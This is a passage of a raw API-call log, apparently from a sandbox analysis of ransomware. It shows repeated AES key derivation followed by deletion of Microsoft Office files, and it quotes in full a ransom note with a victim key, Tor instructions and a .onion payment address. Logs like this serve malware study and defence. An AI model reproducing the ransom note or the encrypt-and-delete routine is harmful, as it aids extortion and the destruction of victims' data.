| out: phKey=0x1d4448e8*=0x9ad878) returned 1 [0177.655] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0177.655] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0177.655] wcslen (_String="\\\\?\\") returned 0x4 [0177.725] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.16.xml") returned 1 [0177.725] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.16.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.16.xml")) returned 1 [0177.726] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0177.726] wcslen (_String="OK") returned 0x2 [0177.726] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0177.726] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0177.726] CryptDestroyKey (hKey=0x9ad878) returned 1 [0177.726] CryptDestroyHash (hHash=0x9ad838) returned 1 [0177.726] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0177.726] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\Recovers your files.html" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0177.727] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0177.727] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0177.728] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0177.728] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0177.728] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0177.728] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0177.728] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0177.728] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.204] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0178.205] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.205] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad2f8) returned 1 [0178.205] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.205] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.205] wcslen (_String="\\\\?\\") returned 0x4 [0178.212] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 1 [0178.213] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif")) returned 1 [0178.213] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0178.213] wcslen (_String="OK") returned 0x2 [0178.213] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.213] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.213] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0178.213] CryptDestroyHash (hHash=0x9ad438) returned 1 [0178.213] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0178.215] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0178.215] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.215] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad738) returned 1 [0178.215] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.215] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.215] wcslen (_String="\\\\?\\") returned 0x4 [0178.260] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 1 [0178.260] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif")) returned 1 [0178.262] CryptDestroyKey (hKey=0x9ad578) returned 1 [0178.262] wcslen (_String="OK") returned 0x2 [0178.262] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.262] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.262] CryptDestroyKey (hKey=0x9ad738) returned 1 [0178.262] CryptDestroyHash (hHash=0x9ad438) returned 1 [0178.262] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0178.264] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0178.264] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.264] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad738) returned 1 [0178.264] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.264] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.264] wcslen (_String="\\\\?\\") returned 0x4 [0178.298] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 1 [0178.298] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif")) returned 1 [0178.299] CryptDestroyKey (hKey=0x9ad778) returned 1 [0178.299] wcslen (_String="OK") returned 0x2 [0178.299] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.300] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.300] CryptDestroyKey (hKey=0x9ad738) returned 1 [0178.300] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0178.300] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0178.302] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44495c | out: phHash=0x1d44495c) returned 1 [0178.302] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.302] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d444960 | out: phKey=0x1d444960*=0x9ad1f8) returned 1 [0178.302] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.302] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.302] wcslen (_String="\\\\?\\") returned 0x4 [0178.354] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 1 [0178.354] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif")) returned 1 [0178.355] CryptDestroyKey (hKey=0x9ad638) returned 1 [0178.355] wcslen (_String="OK") returned 0x2 [0178.355] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.355] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.355] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0178.355] CryptDestroyHash (hHash=0x9ad578) returned 1 [0178.355] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0178.357] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0178.357] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.357] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad278) returned 1 [0178.357] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.357] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.358] wcslen (_String="\\\\?\\") returned 0x4 [0178.381] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 1 [0178.381] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif")) returned 1 [0178.382] CryptDestroyKey (hKey=0x9ad838) returned 1 [0178.382] wcslen (_String="OK") returned 0x2 [0178.382] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.382] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.382] CryptDestroyKey (hKey=0x9ad278) returned 1 [0178.382] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0178.382] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0178.383] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0178.383] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.383] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad178) returned 1 [0178.383] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.383] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.383] wcslen (_String="\\\\?\\") returned 0x4 [0178.387] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 1 [0178.387] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif")) returned 1 [0178.388] CryptDestroyKey (hKey=0x9ad378) returned 1 [0178.388] wcslen (_String="OK") returned 0x2 [0178.388] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.388] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.388] CryptDestroyKey (hKey=0x9ad178) returned 1 [0178.388] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0178.388] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0178.389] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0178.389] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.389] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad378) returned 1 [0178.389] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.389] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.389] wcslen (_String="\\\\?\\") returned 0x4 [0178.527] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 1 [0178.527] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif")) returned 1 [0178.528] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0178.528] wcslen (_String="OK") returned 0x2 [0178.528] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.528] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.528] CryptDestroyKey (hKey=0x9ad378) returned 1 [0178.528] CryptDestroyHash (hHash=0x9ad738) returned 1 [0178.528] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0178.531] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0178.531] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.531] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad638) returned 1 [0178.531] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.531] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.531] wcslen (_String="\\\\?\\") returned 0x4 [0178.611] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 1 [0178.611] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif")) returned 1 [0178.612] CryptDestroyKey (hKey=0x9ad578) returned 1 [0178.612] wcslen (_String="OK") returned 0x2 [0178.612] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.612] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.612] CryptDestroyKey (hKey=0x9ad638) returned 1 [0178.612] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0178.612] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0178.615] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0178.615] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.615] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad338) returned 1 [0178.615] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.615] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.615] wcslen (_String="\\\\?\\") returned 0x4 [0178.645] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 1 [0178.646] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif")) returned 1 [0178.647] CryptDestroyKey (hKey=0x9ad238) returned 1 [0178.647] wcslen (_String="OK") returned 0x2 [0178.647] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.647] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.647] CryptDestroyKey (hKey=0x9ad338) returned 1 [0178.647] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0178.647] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0178.649] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0178.649] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.649] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad378) returned 1 [0178.649] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.649] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.649] wcslen (_String="\\\\?\\") returned 0x4 [0178.652] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 1 [0178.653] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif")) returned 1 [0178.654] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0178.654] wcslen (_String="OK") returned 0x2 [0178.654] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.654] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.654] CryptDestroyKey (hKey=0x9ad378) returned 1 [0178.654] CryptDestroyHash (hHash=0x9ad878) returned 1 [0178.654] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0178.656] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0178.656] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.656] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad778) returned 1 [0178.656] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.656] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.656] wcslen (_String="\\\\?\\") returned 0x4 [0178.705] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 1 [0178.705] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif")) returned 1 [0178.706] CryptDestroyKey (hKey=0x9ad478) returned 1 [0178.706] wcslen (_String="OK") returned 0x2 [0178.707] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.707] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.707] CryptDestroyKey (hKey=0x9ad778) returned 1 [0178.707] CryptDestroyHash (hHash=0x9ad438) returned 1 [0178.707] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0178.709] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0178.709] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.709] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad238) returned 1 [0178.709] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.709] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.709] wcslen (_String="\\\\?\\") returned 0x4 [0178.715] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 1 [0178.715] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif")) returned 1 [0178.716] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0178.716] wcslen (_String="OK") returned 0x2 [0178.716] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.716] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.716] CryptDestroyKey (hKey=0x9ad238) returned 1 [0178.716] CryptDestroyHash (hHash=0x9ad478) returned 1 [0178.716] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0178.718] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0178.718] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.718] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad838) returned 1 [0178.718] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.718] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.718] wcslen (_String="\\\\?\\") returned 0x4 [0178.733] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 1 [0178.733] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif")) returned 1 [0178.734] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0178.734] wcslen (_String="OK") returned 0x2 [0178.734] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.734] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.734] CryptDestroyKey (hKey=0x9ad838) returned 1 [0178.734] CryptDestroyHash (hHash=0x9ad478) returned 1 [0178.734] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0178.736] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0178.736] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.736] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad838) returned 1 [0178.736] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.736] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.736] wcslen (_String="\\\\?\\") returned 0x4 [0178.790] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 1 [0178.790] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif")) returned 1 [0178.791] CryptDestroyKey (hKey=0x9ad338) returned 1 [0178.791] wcslen (_String="OK") returned 0x2 [0178.791] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.791] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.791] CryptDestroyKey (hKey=0x9ad838) returned 1 [0178.791] CryptDestroyHash (hHash=0x9ad578) returned 1 [0178.791] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0178.793] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0178.793] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0178.793] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad1b8) returned 1 [0178.793] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0178.793] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0178.793] wcslen (_String="\\\\?\\") returned 0x4 [0178.834] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 1 [0178.834] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif")) returned 1 [0178.835] CryptDestroyKey (hKey=0x9ad278) returned 1 [0178.835] wcslen (_String="OK") returned 0x2 [0178.835] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.835] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0178.835] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0178.835] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0178.835] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0178.837] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0178.837] CryptHashData 